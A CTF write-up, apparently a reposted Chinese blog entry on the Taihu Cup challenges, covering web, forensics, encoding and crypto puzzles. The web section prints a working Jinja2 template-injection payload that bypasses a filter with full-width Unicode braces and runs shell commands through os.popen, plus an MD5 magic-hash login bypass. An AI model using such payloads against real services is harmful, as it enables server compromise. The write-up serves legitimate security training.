zoukankan      html  css  js  c++  java
  • 太湖杯WriteUp

    web

    checkingame【已解决】

    控制台执行

    var game = new Game();
    game.winning()
    

    easyweb【已解决】

    利用unicode编码规范化绕过waf,再加SSTI

    payload:

    ﹛﹛config.__class__.__init__.__globals__['os'].popen('ls /').read()﹜﹜
    ﹛﹛config.__class__.__init__.__globals__['os'].popen('cat /flag').read()﹜﹜
    

    https://www.anquanke.com/post/id/211363#h2-2

    ezMD5【已解决】

    
    $result = @auth($username,$password);
    if (md5($username) == md5($result)  and $result !== $username){
    echo "bingo : <b>$flag</b>";
    }
    

    数组报错

    http://122.112.253.121:10032/robots.txt

    auth.so

    payload:

    name=240610708&password=abcdabcdabcdabcdabcdabcdabcdabcdQNKCDZO&submit=%E7%99%BB%E5%BD%95
    

    https://ctftime.org/writeup/11325

    misc

    memory【已解决】

    flag{From_Mem_to_find_ans}

    vol.py -f dump --profile=Win7SP1x86_23418 pslist
    vol.py -f dump --profile=Win7SP1x86_23418 dlllist
    上面的没发现什么
    看一下文件,太多..
    vol.py -f dump --profile=Win7SP1x86_23418 filescan
    发现进程有浏览器,看一下历史记录
    vol.py -f dump --profile=Win7SP1x86_23418 iehistory
    发现这个:
    Volatility Foundation Volatility Framework 2.6.1
    **************************************************
    Process: 2072 explorer.exe
    Cache type "URL " at 0x1a45000
    Record length: 0x100
    Location: :2020110520201106: link3@file:///C:/Users/link3/Desktop/Untitled.png
    Last modified: 2020-11-05 00:11:38 UTC+0000
    Last accessed: 2020-11-04 16:11:39 UTC+0000
    File Offset: 0x100, Data Offset: 0x0, Data Length: 0x0
    去文件列表找对应的文件,然后提取
    vol.py -f dump --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003fdf6118 --name Untitled.png -D ./
    得到flag
    

    misc

    给了一个word和加密的压缩包

    word内容base64

    Salted__x›€y RƒËM.ËJ˜uÞZҏóœÂ€ ppõé؇D´l{ÒEGªÜ#ÀøϚ(¶o¨Náì@E’ò‰?ä)ìàµtÚó;O“ïAeXéIÝw€ö’pÐÍãÐø»èKúX7v:;ï%S¬Ò¾ä…3–jôI„wÞÑÒ«v3$dÁKVlh¿°`¼µ9Í~ÂåÑ$6%äɄÿÚ5M‹˜õSÉÍòâDñû+0òö¬§Z€WӞÙi(¬“‚®§Pñ
    ïÄógHÑ2þŒ$í²µL¿Þg›OKUŠ[mýÅ¾Ø -.ªæ_œâv9ùhF{¦ü
    ހ²xs‡úñ¶€ÇT£º°a"º}ÌÕ+ì@K×w·ò–f19‚¥FPš—Ê®©cÕaI¸qúi»PÀۃoèÙÄÈ9A óÀøirìØJS“ 	Ø]+^Ó_¼öýb>©ÉôX5™táeô¼úV°(ï%å½|X^IW§!¢îë‹.¤+(ÀãQB™R×LŸD^
    Ñò·ž«îø¹2†^°ûm¶AhÛ$]ÙØGoY*6w"p©3Í)g‰¯ÿárpþ(ü1öƒS
    àBKýâI$H)òÊ{®9åö¸Ù@¶-µâ`›Yaþ§çàñÈYýÉ+Í}’ ܎¬ç-ïøE¯Ô›Õepˆ„Ã[•íÍSþb¿È'H¤—s2ïAÞ®jòItO&ozzß©Î϶|ˆìQ‰å‰ä¦­9"L¬ß”]üBÜÑHVÃs´s‹¾y‹P“;¿÷åG-E‹äS·r偁Œ15u§ªvzóqp¬Î[q¾“NíÿC›)¤Yª6³—ùËqå¾q‰‡’gÅÅ#i,è¾Ú´»Í÷!œˆ™/¨Ýœ?­rä:fYîŒa0Ïô~]ÕïHk÷Ã?J¯t¢~9.N>XçnŒ°ú{B¡Geü‚í݆"¶šu#‹ùâ0}«ÂªÆ•Œ[‘÷çÒ
    d¢üw±ÌG¬ÎgÁ³K½.i?y®‚CÚV°ˆƒ¼¡$
    b›2x o1qgþ³ŒÜ폒ä“([»¿×gz3›º~Q%Ã.PUÐ_zžè¦èþ
    Àq«E[/ª„*D
    —Þ.­¹‘¼:ª³'´*îCØ´Dª¡†ÊË!P¶Všùqâí…RØø^
    

    勾选隐藏文字

    waoootu.epj,nv o
    www.verymuch.net
    

    解密得到

    love and peaceee
    

    刚刚base64解密的带Salted__, 大概率是rabbit加密

    解密得到

    LR2TMNLCGBOHKNDGGVRFY5JWGZTDAXDVMZTDCYK4OU4GCZRYLR2TSNTCHBOHKNJUMM4VY5JVGBSTOXDVHE3DIZC4OU2TIM3ELR2TQYLGHBOHKOJWGQYFY5JWGQ3DSXDVHE3GEOC4OU2TAZJXLR2TOZRTMROHKOBVME4VY5JVGRQTIXDVHAYDEOC4OU4GCZRYLR2TSNTCHBOHKNRRGY3VY5JVHA2WKXDVHAZDOMS4OU2WGMDBLR2TKNDDHFOHKODGMU3FY5JYMFSTMXDVG5QTOYK4OU3DENBQLR2TSNRUMROHKNRSGEYVY5JVMZTDKXDVHE3GEOC4OU3TSNJXLR2TQYLFGZOHKNLGMY2VY5JVGRRTSXDVHE3DIMC4OU2TMYRULR2TKNDDHFOHKNJWMM4VY5JUMZSWKXDVGU4TGN24OU4TMM3GLR2TMY3FGJOHKOBSG4ZFY5JYGM4GCXDVGVRGGMS4OU4GCZJWLR2TKOBVMVOHKNJUHEZFY5JYGM4GCXDVG43TGZK4OU3DEMJRLR2TKNDDHFOHKNRSGQYFY5JUMYYGMXDVHAYDKZK4OU4DKYJZLR2TSNTCHBOHKNRRGBSFY5JZGVRWIXDVGU2DGNS4OU3DENBQLR2TIZTFMVOHKNRWGJTFY5JYGI3TEXDVGY2DMOK4OU4GCMZWLR2TKNTCGROHKNJUMM4VY5JZHA2TQXDVGYYTAZC4OU2TIYZZLR2TKMZXGNOHKNDGMVSVY5JVGRRTSXDVG5QTOYK4OU4DOMLDLR2TSNRUGBOHKNJWMM4VY5JUMYYGMXDVGVTGMNK4OU2TIYZZLR2TMNBWHFOHKNJUMM4VY5JUMVQTMXDVHAZTQYK4OU2TIYZZLR2TONZTMVOHKNJUME2FY5JVHE4DEXDVHE4DKOC4OU2TSOBS
    

    base32

    u65b0u4f5bu66f0uff1au8af8u96b8u54c9u50e7u964du543du8af8u9640u6469u96b8u50e7u7f3du85a9u54a4u8028u8af8u96b8u6167u585eu8272u5c0au54c9u8fe6u8ae6u7a7au6240u964du6211u5ff5u96b8u7957u8ae6u5ff5u54c9u9640u56b4u54c9u56c9u4feeu5937u963fu6ce2u8272u838au5bc2u8ae6u585eu5492u838au773eu6211u54c9u6240u4f0fu805eu85a9u96b8u610du95cdu5436u6240u4feeu662fu8272u6469u8a36u56b4u54c9u9858u610du54c9u5373u4feeu54c9u7a7au871cu9640u56c9u4f0fu5ff5u54c9u6469u54c9u4ea6u838au54c9u773eu54a4u5982u9858u5982
    

    unicode

    与佛论禅

    Live beautifully, dream passionately, love completely.
    

    解压给的压缩包,看频谱图

    flag{m1sc_1s_funny2333}

    broken secret

    crypto

    Certificate Authority

    或许相关:

    https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/

    http://showlinkroom.me/2020/01/21/CVE-2020-0601-Research/
    md5 decrypt

  • 相关阅读:
    apache22与mod_mono
    设计模式之行为型模式
    jquery实现excel导出
    桥本分数式问题的C++算法
    [深入浅出iOS库]之图形库Core Plot
    HDU 1069 Monkey and Banana
    程序员咋学习
    JavaSocket通信(双向,有界面)
    BZOJ 3098(Hash Killer II生日攻击)
    [置顶] iPhone 5S及iWatch或将采用指纹验证技术
  • 原文地址:https://www.cnblogs.com/twosmi1e/p/13984911.html
Copyright © 2011-2022 走看看